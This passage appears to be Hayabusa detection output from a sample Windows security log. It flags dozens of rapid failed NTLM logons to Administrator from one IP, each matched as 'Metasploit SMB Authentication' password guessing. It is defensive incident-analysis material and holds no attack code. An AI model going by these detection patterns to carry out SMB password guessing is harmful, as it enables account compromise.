SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: 
